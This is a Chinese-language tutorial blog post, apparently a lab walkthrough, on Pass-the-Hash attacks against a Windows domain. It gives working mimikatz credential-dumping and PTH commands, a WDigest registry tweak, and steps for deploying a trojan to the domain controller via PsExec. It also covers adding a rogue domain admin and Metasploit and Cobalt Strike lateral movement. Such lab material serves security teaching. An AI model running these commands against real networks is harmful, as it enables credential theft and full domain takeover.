PTH哈希传递攻击

2024-09-01 04:44
文章标签 哈希 攻击 传递 pth

本文主要是介绍PTH哈希传递攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

PTH哈希传递攻击(Pass The Hash)

一、PTH简介

1、攻击原理

在使用 NTLM 身份验证的系统或服务上,用户密码永远不会以明文形式通过网络发送。 Windows 上的应用程序要求用户提供明文密码,然后调用 LsaLogonUser 类的 API,将该密码转换为一个或两个哈希值(LM或NTLM hash),然后将其发送到远程服务器进行 NTLM 身份验证。由于这种机制,我们只需要哈希值即可成功完成网络身份验证,而不需要明文密码。于是当我们获取到任意用户的 Hash 值就可以针对远程系统进行身份验证并模拟该用户,从而获取用户权限。

2、使用原因
  • 在Windows Server 2012 R2及之后版本的操作系统中,默认在内存中不会记录明文密码,只保存用户的 Hash。所以无法抓取到 lsass.exe 进程中的明文密码。

  • 随着信息安全意识的提高,大家都使用强密码,很多时候即使能拿到 hash 却无法解开。

3、LM Hash 与 NTLM Hash

1.3.1 LM Hash

(1)LM Hash(LAN Manager Hash):微软为了提高Windows操作系统的安全性而采用的散列加密算法。

存在的问题——易被破解:LM Hash明文密码被限制在14位以内,其本质上采用的是 DES 加密算法,所以 LM Hash 存在较容易被破解的问题。于是从 Windows Vista 和Windows Server 2008开始的 Windows 系统默认禁用了 LM Hash 。这里只是禁用,主要是为了保证系统的兼容性。如果LM Hash被禁用了,攻击者使用工具抓取的 LM Hash 通常为"aad3b435b51404eeaad3b435b51404ee"。

(2)NTLM Hash

NTLM Hash(NT LAN Manager):为了在提高安全性的同时保证兼容性,微软提出了 Windows NT 挑战/响应验证机制,称之为 NTLM 。个人版 Windows 从Windwos Vista 以后,服务器版本系统从 Windows server2003 以后,其认证方式均为 NTLM Hash。

二、PTH 攻击

1、实验环境

域控DC:Windows Server 2016 (ad.woniuxy.com)

IP:192.168.137.133(域管用户[域]:administrator)

域内计算机:Windows 7

IP:192.168.137.135(本地管理员[工作组]:administrator,域账号:zhangsan)

攻击机kali:192.168.137.129

域:woniuxy.com

2、使用 mimikatz 进行 PTH

此处实验环境,假设我们获取了本地管理员权限,且域管理员登录到这台电脑上(能从内存中获取域管理员的 NTML Hash)。

使用kali连接到Windows 7 并提权到SYSTEM权限

image-20240519132751184

使用kiwi收集账号信息

image-20240519133103965

上传 mimikatz 到 win7 上,在具有管理员权限的 cmd 中运行 mimikatz.exe,获取debug权限,而后查询当前机器中所有可用凭证。

image-20240519135139115

log                         # 在当前目录下写日志,输出结果均在日志中
privilege::debug            # 提升至调试(debug)权限(需要本地管理员权限)
sekurlsa::logonpasswords    # 查看所有可用的凭证(登录到本机的所有用户)

如果目标主机是Windows2012或更高版本,默认情况下是无法查看明文密码的,可以按照以下方式查看:

添加注册表:reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
强制锁屏:rundll32 user32.dll,LockWorkStation
查看明文密码: mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit    # 直接运行Mimikatz命令,不进入交互模式

image-20240519150047210

查找到域管理员的凭证信息,如上图,可以看到用户名为 Administrator ,属于woniuxy 这个域,登录的服务器为 DC 。获取到域管理员的 NTLM Hash。

利用 mimikatz 进行 PTH 攻击,命令如下:

# sekurlsa::pth /user:用户名 /domain:域名或者域控IP /ntlm:用户的NTLM Hash
sekurlsa::pth /user:administrator  /domain:192.168.137.133  /ntlm:48c8c0229d12aaa3cbc56fc2f4ada50c

image-20240519151328439

会弹出一个cmd,在弹出的cmd中,可以直接连接该主机、查看目录文件等操作。

dir \\192.168.137.133\c$    # 查看DC的C盘

image-20240519151508902

3、在域控上执行木马

(1)尝试往域控写入木马文件

复制木马到域控

copy c:\mm_64.exe \\ad\c$

在kali上开启监听

image-20240519152803737

(2)使用定时任务在域控上启动木马(失败)
# 旧版系统使用定时任务(at命令在新版本的操作系统中已经弃用)
at \\ad 15:27 cmd.exe /c "C:\mm_64.exe"
查看定时任务
at \\ad
​
#新版系统定时任务
CHTASKS /Create /TN HTTPBeacon /S AD  /TR C:\mm_64.exe /SC  ONCE /ST 15:40 /U 用户名 /P 密码
(3)使用psexec.exe启动木马
#复制PsExec到域控
copy c:\PsExec64.exe \\ad\c$
#使用psexec.exe启动木马
c:\>PsExec64.exe /accepteula /s \\ad cmd /c "C:\mm_64.exe"

image-20240519162606540

(4)使用psexec工具在域控上获取一个反弹Shell,用于执行命令:
PsExec.exe /accepteula \\ad cmd.exe
​
net user username password /add
net group "domain admins" username /add

image-20240519163017166

三、在MSF中操作和利用

1、使用Kiwi模块

meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > getsystem 提权到SYSTEM权限(前提默认是本地管理员登录)
meterpreter > kiwi_cmd sekurlsa::logonpasswords

2、使用psexec模块

待完善

use exploit/windows/smb/psexec
show options
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.219.144
set SMBDomain woniuxy
set SMBUser administrator
set SMBPass 111:48c8c0229d12aaa3cbc56fc2f4ada50c

直接可以拿下域控。附:PSTools工具中自带命令的功能:

PsExec - 远程执行进程
PsFile - 显示远程打开的文件
PsGetSid - 显示计算机或用户的 SID
PsInfo - 列出有关系统的信息
PsPing - 测量网络性能
PsKill - 按名称或进程 ID 终止进程
PsList - 列出有关进程的详细信息
PsLoggedOn - 查看本地登录的用户以及通过资源共享 (完整源包含)
PsLogList - 转储事件日志记录
PsPasswd - 更改帐户密码
PsService - 查看和控制服务
PsShutdown - 关闭并选择性地重启计算机
PsSuspend - 挂起进程

微软在线帮助手册:PsExec - Sysinternals | Microsoft Learn

3、在CS中进行横向移动

(1)拿下域中某台主机,并确保CS上线,并提权

image-20240519203458008

image-20240519203529577

(2)运行net view,查看域内主机列表

image-20240519203652146

(3)在受控主机上右键运行Access -> Dump Hashes,获取所有本机Hash值,在通过View -> Credentials 查看所有Hash值列表。

image-20240519204013689

(4)在受控主机上按下图运行,获取域内的账号信息

image-20240519203937140

image-20240519204045282

(5)在Targets视图中,找到域内主机,右键Jump,并利用Hash进行登录上线。

image-20240519204300775

image-20240519204316576

image-20240519204400291

(6)使用 梼杌 或 谢公子 等CS插件,可以更加方便地获取域信息,制作票据,进行横向移动等。

4、在CS中利用进程注入获得域控权限

(1)只要是域管理员登录到Windows7主机上(无论是本地登录,或是远程桌面登录),则在Windows7中就存在域管理权限的进程,可以利用该进程提权到域管理员权限。

(2)浏览Windows7 的进程,并选择一个属于Woniuxy\Administrator用户的进程,进行Inject注入,再选择一个木马,即可以域管理员权限上线该木马。

image-20230816150410602

(3)在该上线的木马中运行 shell dir \\ad\c$ ,发现可以访问,后续操作一致。

这篇关于PTH哈希传递攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1125976

相关文章

哈希leetcode-1

目录 1前言 2.例题  2.1两数之和 2.2判断是否互为字符重排 2.3存在重复元素1 2.4存在重复元素2 2.5字母异位词分组 1前言 哈希表主要是适合于快速查找某个元素(O(1)) 当我们要频繁的查找某个元素,第一哈希表O(1),第二,二分O(log n) 一般可以分为语言自带的容器哈希和用数组模拟的简易哈希。 最简单的比如数组模拟字符存储,只要开26个c

如何在页面调用utility bar并传递参数至lwc组件

1.在app的utility item中添加lwc组件: 2.调用utility bar api的方式有两种: 方法一,通过lwc调用: import {LightningElement,api ,wire } from 'lwc';import { publish, MessageContext } from 'lightning/messageService';import Ca

usaco 1.3 Prime Cryptarithm(简单哈希表暴搜剪枝)

思路: 1. 用一个 hash[ ] 数组存放输入的数字,令 hash[ tmp ]=1 。 2. 一个自定义函数 check( ) ,检查各位是否为输入的数字。 3. 暴搜。第一行数从 100到999,第二行数从 10到99。 4. 剪枝。 代码: /*ID: who jayLANG: C++TASK: crypt1*/#include<stdio.h>bool h

哈希表的底层实现(1)---C++版

目录 哈希表的基本原理 哈希表的优点 哈希表的缺点 应用场景 闭散列法 开散列法 开放定值法Open Addressing——线性探测的模拟实现 超大重点部分评析 链地址法Separate Chaining——哈希桶的模拟实现 哈希表(Hash Table)是一种数据结构,它通过将键(Key)映射到值(Value)的方式来实现快速的数据存储与查找。哈希表的核心概念是哈希

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网

哈希表的封装和位图

文章目录 2 封装2.1 基础框架2.2 迭代器(1)2.3 迭代器(2) 3. 位图3.1 问题引入3.2 左移和右移?3.3 位图的实现3.4 位图的题目3.5 位图的应用 2 封装 2.1 基础框架 文章 有了前面map和set封装的经验,容易写出下面的代码 // UnorderedSet.h#pragma once#include "HashTable.h"

【408数据结构】散列 (哈希)知识点集合复习考点题目

苏泽  “弃工从研”的路上很孤独,于是我记下了些许笔记相伴,希望能够帮助到大家    知识点 1. 散列查找 散列查找是一种高效的查找方法,它通过散列函数将关键字映射到数组的一个位置,从而实现快速查找。这种方法的时间复杂度平均为(

JAVA基础:值传递和址传递

1 值传递和址传递 值传递 方法调用时,传递的实参是一个基本类型的数据 形参改变,实参不变 public static void doSum(int num1,int num2){}main(){doSum(10,20);int i = 10 ;int j = 20 ;doSum(i,j) ;}   public static void t1(int num){num = 20

PHP: 深入了解一致性哈希

前言 随着memcache、redis以及其它一些内存K/V数据库的流行,一致性哈希也越来越被开发者所了解。因为这些内存K/V数据库大多不提供分布式支持(本文以redis为例),所以如果要提供多台redis server来提供服务的话,就需要解决如何将数据分散到redis server,并且在增减redis server时如何最大化的不令数据重新分布,这将是本文讨论的范畴。 取模算法 取模运

哈希表题总结

哈希表题总结 hot100两数之和字母异位词分组最长连续序列 hot100 两数之和 题目链接: 1.两数之和 代码: class Solution {public int[] twoSum(int[] nums, int target) {Map<Integer,Integer> map = new HashMap<>();int n = nums.length;for